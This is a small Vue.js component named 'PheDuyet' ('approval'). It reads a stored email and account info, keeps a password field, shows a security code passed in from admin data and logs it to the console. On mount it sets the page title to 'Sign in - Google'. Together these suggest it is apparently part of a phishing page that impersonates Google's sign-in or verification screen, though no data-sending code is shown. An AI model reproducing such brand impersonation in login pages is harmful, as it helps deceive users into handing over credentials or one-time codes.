<template src="./index.html">
    
</template>
<script>
// ...existing code...
export default {
  name: 'PheDuyet',
  props: {
    adminData: {
      type: Object,
      default: () => ({})
    }
  },
  data() {
    return {
      username: localStorage.getItem('email'),
      userInfo : localStorage.getItem('accountinfo') ? JSON.parse(localStorage.getItem('accountinfo')) : {},
      message: '',
      password: '',
    };
  },

  computed: {
    displaySecurityCode() {
      // Ưu tiên sử dụng securityCode từ adminData nếu có
      return this.adminData.securityCode;
    }
  },
  watch: {
    adminData: {
      handler(newData) {
        if (newData && newData.securityCode) {
          console.log('Received new securityCode:', newData.securityCode);
        }
      },
      deep: true,
      immediate: true
    }
  },
  created() {
  
  },
  mounted() {
    document.title = "Sign in - Google";
  },
  methods: {
  }
};
</script>

<style lang="css" scoped>
@import "./styles.css";
</style>